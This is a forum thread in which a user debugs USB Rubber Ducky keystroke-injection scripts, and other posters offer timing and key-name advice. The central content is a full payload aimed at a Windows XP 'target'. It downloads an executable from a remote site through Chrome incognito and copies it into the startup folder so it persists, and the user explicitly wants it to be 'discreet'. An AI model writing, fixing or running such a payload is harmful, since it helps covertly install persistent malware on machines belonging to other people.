BlueMint Posted October 22, 2015 Posted October 22, 2015 (edited) Hi ! I received my Ducky yesterday and I tried to make a script but it didn't work, so I wrote a very simple script to isolate the part that doesn't work. I added a few delays, too, but it didn't solve the problem. REM Test file DELAY 2000 GUI r DELAY 1000 STRING notepad.exe ENTER When I try with this one, nothing happens, unless I'm in a webpage or a text editor, and then, the following characters appear on my screen : rnotepad.exe So, I guess that the combo "GUI + r" doesn't work. It's quite bothering, I can't do what I wanted, without this shortcut... (I actually want to launch cmd). I tried a few things but nothing worked : - Replacing "GUI r" by "WINDOWS r" or "GUI R" - Trying different encoders. I've tried the online encoder, the v 1.2 command-line encoder, the encoder with a graphical interface. - Trying different language settings (I have a french keyboard). - Pressing the button on the Ducky. I'm running the script on Windows 8. Do you have any idea on why this shortcut doesn't work and what I could do to solve this ? Thanks a lot. Edited October 22, 2015 by BlueMint Quote
phpsystems Posted October 22, 2015 Posted October 22, 2015 On windows 8, you might want to try: CONTROL ESCAPE Instead of GUI r Quote
BlueMint Posted October 22, 2015 Author Posted October 22, 2015 (edited) On windows 8, you might want to try: CONTROL ESCAPE Instead of GUI r Thanks for the help. This shortcut works on windows 8 (with looong delays), but unfortunately, my real target is a windows XP. On XP, "CONTROL ESCAPE" only opens the windows menu, and then, when I type "cmd", the first item beginning by a "c" is launched... Edited October 22, 2015 by BlueMint Quote
Mr-Protocol Posted October 22, 2015 Posted October 22, 2015 Your initial delay needs to be pretty long due to device detection of the OS. Mileage may vary. Quote
BlueMint Posted October 23, 2015 Author Posted October 23, 2015 (edited) Your initial delay needs to be pretty long due to device detection of the OS. Mileage may vary. I put a "DELAY 5000" in the beginning, and "GUI r" still doesn't work on win8. But it doesn't matter : as phpsystems said, there is still the "CONTROL escape" shortcut in this OS. Now, I'm testing my payload on Windows XP. It failed a few times, but I understood that it was because I was using it on a VM : some random keys fail, sometimes, with vms. Okay, so I tested it on a real windows XP and the ducky's behaviour is pretty unstable. The worst part is that some commands doesnt work, like "CONTROL x", "CONTROL c", "CONTROL v". I'm trying to replace them with more complex operations (F10 - RIGHT - DOWN - DOWN - DOWN - ENTER, in windows explorer, to copy a file) but it's really bothering, because it takes more time, it's not discreet, and it's not really stable either... So do you have any idea on why those commands doesn't work ? Do I have to update the ducky's firmware or anything ? Edited October 23, 2015 by BlueMint Quote
Mr-Protocol Posted October 24, 2015 Posted October 24, 2015 Try CTRL vs CONTROL and see if that makes a difference. Post your source you are compiling? Start with putting some delays between every command to see if it's working properly and then trim down the delays from there. For example, if you are trying to do GUI + R, cmd, enter too fast, the computer may not have the run box active before the ducky start typing cmd and enter. Quote
BlueMint Posted October 25, 2015 Author Posted October 25, 2015 (edited) Thanks for the help. So, this is my script. I replaced "CONTROL" by "CTRL" as you suggested, and I put 1000ms delays around the "control" commands : DELAY 6000 GUI r DELAY 1000 STRING chrome -incognito "http://mysite/file.exe" ENTER DELAY 3000 CONTROL j DELAY 1000 TAB DELAY 100 TAB DELAY 100 TAB DELAY 100 ENTER DELAY 100 LEFT DELAY 100 ENTER DELAY 500 TAB DELAY 100 ENTER DELAY 1000 TAB DELAY 1000 ENTER DELAY 1000 CTRL c DELAY 1000 ALT F4 DELAY 1000 GUI r DELAY 1000 STRING cmd ENTER DELAY 1000 STRING start shell:startup ENTER DELAY 1000 CTRL v DELAY 1000 ENTER DELAY 1000 DOWN DELAY 1000 STRING - DELAY 1000 UP DELAY 1000 LEFT DELAY 1000 ENTER DELAY 1000 ALT f4 DELAY 1000 ALT f4 DELAY 1000 (The part where I download a file in chrome is only because powershell is not installed in my target's computer, and "ftp" command give me errors on windows xp, so I can't get my file directly with the shell). I'm not sure either about the "STRING -" (to uncheck a windows box) but my payload stops working before that point. I made a video. Look, at 00:17, i've "opened file location" in chrome, and I send the command : CTRL c. And the path is suddently selected, and nothing is copied in the clipboard. I have the same problem with CONTROL c, or with CTRL x. https://www.youtube.com/watch?v=nbAXdFJ2cLc Edited October 25, 2015 by BlueMint Quote
Mr-Protocol Posted October 25, 2015 Posted October 25, 2015 That is kind of odd. Maybe add a keyboard "b" key press like you were spelling out the program to highlight it and try that out? I don't have a Win XP to test on. It may be doing something funky with Chrome "Show In Folder" with XP and selecting the path bar instead of the file itself. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.